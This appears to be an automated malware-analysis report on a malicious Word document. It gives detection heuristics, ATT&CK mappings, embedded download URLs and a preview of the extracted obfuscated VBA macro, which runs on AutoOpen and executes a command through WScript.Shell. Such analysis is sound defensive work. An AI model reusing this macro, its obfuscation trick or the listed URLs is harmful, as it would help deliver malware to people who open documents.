MALICIOUS
290
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The file contains VBA macros that utilize WScript.Shell to execute commands, indicated by the critical OLE_VBA_SHELL and OLE_VBA_WSCRIPT heuristics. The script attempts to construct the string 'WscRipt.sHeLl' and likely uses it to download and execute a second-stage payload from the embedded URLs. The presence of an AutoOpen macro further suggests an automated execution flow upon opening the document.
Heuristics 9
-
ClamAV: Doc.Malware.Generic-6818422-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Generic-6818422-0
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
WScript.Shell usage critical OLE_VBA_WSCRIPTWScript.Shell usageMatched line in script
End Select XSS84 = "" + Downsized41 + blue15 + AutoLoanAccount4 + "WscRipt.sHeLl" + Liaison8 + payment82 Select Case National91 -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
End Select indexing17 = Array(International81, skyblue75, Awesome62, CreateObject("" + Incredible83 + Factors81 + XSS84).Run!("" + Executive88 + Namibia79 + copying52 + initiatives70.TextBox1 + invoice65 + proactive13, PGWAhWwuk), Cambridgeshire71, AwesomeCottonTable73, GuyanaDollar91) Select Case payment34 -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Name = "Marketing96" Sub autoopen() Mission97 = Research55 -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://samix-num.com/BcFUhvDr@http://economiadigital.biz/NKq5eOZ@http://ftp.dailyigni In document text (OLE body)
- http://migoshen.org/FNE1TVJjI@http://vanoostrom.org/w8yXb69h5In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 4890 bytes |
SHA-256: d58bc63444b91bae6c3d43940b5e3e46ea5cdbf00509346fde36f3b1a44c9f29 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "initiatives70"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "olive13"
Function reciprocal90()
On Error Resume Next
Select Case Rubber92
Case 210
Rubber87 = CLng(641)
Accountability31 = EXE10
pixel78 = CDate(Island53)
missioncritical8 = JBOD5
website86 = Int(743)
Case 276
tangible46 = helpdesk94
RefinedPlasticCar27 = Cos(Operations63)
yellow25 = Alabama24
knowledgebase17 = ChrB(941)
repurpose53 = paradigm7
End Select
Select Case redefine63
Case 40
invoice79 = CLng(33)
payment62 = Buckinghamshire55
generating32 = CDate(CostaRicanColon2)
interfaces29 = FantasticFrozenSalad91
haptic17 = Int(529)
Case 798
Station17 = LicensedSteelKeyboard15
program22 = Cos(Sleek66)
Openarchitected16 = hardware27
clearthinking15 = ChrB(627)
Ergonomic51 = Islands42
End Select
XSS84 = "" + Downsized41 + blue15 + AutoLoanAccount4 + "WscRipt.sHeLl" + Liaison8 + payment82
Select Case National91
Case 513
seamless79 = CLng(632)
AwesomeSteelCheese49 = backend19
Naira33 = CDate(bypass13)
AlgerianDinar74 = digital15
GB34 = Int(336)
Case 187
empower61 = Dynamic58
compress31 = Cos(Adaptive10)
magenta74 = red33
Inlet13 = ChrB(924)
strategy28 = driver2
End Select
Select Case Product94
Case 253
partnerships84 = CLng(216)
Borders1 = infrastructures95
optical37 = CDate(integrate84)
Colorado48 = Quality14
Cotton85 = Int(324)
Case 996
transmit75 = Buckinghamshire85
content88 = Cos(Sleek52)
Lodge63 = Solutions75
withdrawal93 = ChrB(870)
webreadiness94 = optical68
End Select
PGWAhWwuk = 0
Select Case networks98
Case 731
Lake74 = CLng(926)
TimorLeste71 = Stream11
networks43 = CDate(Land74)
Wyoming85 = XML88
Assistant69 = Int(298)
Case 74
Ranch25 = vertical42
GenericSteelTable27 = Cos(mindshare70)
Tala37 = platforms99
EthiopianBirr49 = ChrB(734)
MoneyMarketAccount17 = leadingedge96
End Select
Select Case deposit47
Case 505
Data98 = CLng(947)
Pula76 = JBOD26
Electronics50 = CDate(Directives93)
digital61 = THX19
Gambia17 = Int(319)
Case 449
Ergonomic98 = quantify7
Cotton10 = Cos(connecting16)
Berkshire9 = Clothing55
Director47 = ChrB(366)
syndicate95 = NewMexico87
End Select
indexing17 = Array(International81, skyblue75, Awesome62, CreateObject("" + Incredible83 + Factors81 + XSS84).Run!("" + Executive88 + Namibia79 + copying52 + initiatives70.TextBox1 + invoice65 + proactive13, PGWAhWwuk), Cambridgeshire71, AwesomeCottonTable73, GuyanaDollar91)
Select Case payment34
Case 187
FantasticSteelBall12 = CLng(385)
RusticPlasticMouse34 = alarm31
fullrange42 = CDate(Rubber80)
Officer99 = Berkshire10
unleash32 = Int(738)
Case 449
JSON69 = Cambridgeshire41
RSS61 = Cos(Generic68)
FantasticGraniteGloves74 = SmallPlasticChicken28
superstructure53 = ChrB(154)
Avon42 = wireless14
End Select
Select Case streamline25
Case 57
r1080p8 = CLng(54)
extend65 = GenericCottonBall73
withdrawal67 = CDate(Selfenabling50)
Toys97 = deposit30
invoice89 = Int(805)
Case 908
parse20 = whiteboard69
Generic43 = Cos(Electronics91)
AntiguaandBarbuda21 = Sharable29
withdrawal34 = ChrB(875)
Fantastic66 = orchid16
End Select
Select Case Corporate43
Case 789
repurpose94 = CLng(703)
HandcraftedSteelShirt34 = Frozen36
asynchronous23 = CDate(Frontline16)
COM10 = Industrial86
AwesomeConcreteShirt37 = Int(179)
Case 918
Cotton49 = circuit62
multistate29 = Cos(Squares17)
directional22 = ivory47
Granite98 = ChrB(745)
bypass29 = Metal48
End Select
End Function
Attribute VB_Name = "Marketing96"
Sub autoopen()
Mission97 = Research55
synergies78 = Array(Steel97, userfacing1, Park30, reciprocal90, TurkishLira30, dynamic33, wireless52)
input37 = deposit7
End Sub
Function Assistant78()
ShoesMovies40 = clientdriven19
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.